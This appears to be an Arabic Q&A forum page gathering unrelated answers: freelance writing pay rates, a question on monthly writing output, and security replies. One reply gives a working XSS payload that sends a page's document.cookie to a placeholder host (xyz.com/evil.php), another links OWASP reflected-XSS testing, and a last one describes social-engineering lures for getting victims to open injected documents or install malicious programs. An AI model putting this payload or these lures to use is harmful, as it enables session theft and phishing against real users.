لوحة المتصدرين

بشكل عام فإن الاجور في الكتابة متفاوتة جداً جداً .. وتتعلق بالدرجة الاولى بالمحتوى المطلوب، وفي حين ان كاتب صحفي في اليمن يحصل على 4 دولار مقابل القطعة، فإن أكثر العاملين في الكتابة في مواقع مصرية كثيرة يحصلون على 25 دولار تقريبا مقابل القطعة .. ولكن هذه الاسعار للمبتدئين فقط، حيث ان الاسعار التي يحصل عليها المحترفين هي 60$ وما فوق، وكثيراً ما تكون 75$ للقطعة .. ولكنها تصل احياناً إلى 150 دولار للقطعة، هذا غير ان المشاهير عندما يكتوب للمواقع والمجلات الاحترافية، قد يحصلون على مئات او ربما آلاف الدولارات مقابل مقالة رأي، وليس تقرير! فالامر متعلق

من باب تبادل الخبرات، يثيرني معرفة عدد المقالات والتقارير التي يكتبها الكتاب المستقلين شهرياً ؟ باعتبار الكتابة عملية ابداعية وتتطلب البحث والتمحيص والمراجعة .. فلا يُمكن الكتابة بشكل مستمر وبدون انقطاع ! فكم تكتب شهرياً ؟ ومتى تكتبها؟ صباحاً او مساءً؟ وهل لديك وقت فارغ كاف في حياتك ؟

السلام عليكم، تأكد من أنك بداية لا تستخدم أي إضافة أو مكافح فيروسات قد يمنع تنفيذ شفرات XSS كنوع من الحماية (مثل NoScript وسواها). الرابط الخاص بموقعك لا يعمل، يبدو أن الاستضافة قامت بحظره أو إزالته. قم أيضًا بوضع قيمة للـ cookie في المستند قبل محاولة سرقتها.. الصفحة بشكل افتراضي لا تملك أي cookie فمن الطبيعي ألا تحصل على أي قيمة لا تنس الاطلاع أيضًا على جوابي في سؤالك السابق حول الاستغلال بدون استخدام document.location

السلام عليكم يمكنك حقن التالي في الحالتين وسيتم التنفيذ عند عرض الصفحة. ملاحظة: الـ alert() موجود فقط للإشارة إلى نجاح تنفيذ الثغرة. <script>img=new Image();img.onerror = function() {alert('XSS executed')};img.src="http://xyz.com/evil.php?cookie="+document.cookie;</script> خذ بعين الاعتبار أنك لم تعرض لنا رابط مشروعك لنختبر الحقن عليه قبل الإجابة، علمًا أن شرحك للمشكلة متشابك وغير واضح تمامًا. والسلام عليكم ورحمة الله وبركاته

جرب هذا المقال الذي يتحدث عن اسلوب تطبيق reflected xss https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)#Example_6:_Including_external_script

أخي الطريقة يجب أن تعتمد على أسلوب الهندسة الاجتماعية. والهندسة الاجتماعية هي اسلوب يعتمد على الحنكة والدهاء لخداع الضحية واستدراجه إلى الضغط على رابط أو تسجيل الدخول ضمن صفحة أو تركيب برنامج. على سبيل المثال في الحرب الدائرة في سوريا تستغل أطراف موالية للنظام الرسمي تُعرف باسم الجيش السوري الالكتروني عناوين كثيرة لاستدراج الموالين للمعارضة، من شاكلة: - عاجل ملف مسرّب يضم أسماء جميع المعتقلين في فرع الخطيب. - عاجل فيديو يظهر ماهر الأسد مصابا - برنامج vpn قوي جدا لضمان سرية اتصالاتك كما ترى فهذه العناوين سوف تجذب فئة مُحددة لتحميل ملف docx محقون أو تثبيت برنامج exe خبيث أو الضغط على رابط يحقن xml. ما هذا إلا مثال. تعتمد الهندسة الاجتماعية على معرفة دقيقة بالضحية أو بالشريحة المستهدفة ومن ثمّ بناء عنوان يجذب الضحية بدهاء. أحيانًا تحتاج إلى جعل المستخدم يملئ نموذج معين والضغط على زر، وهذا يحتاج إلى المزيد من التكتيك في بناء نموذج أكثر إيهامًا. للمزيد انظر هذه الصفحة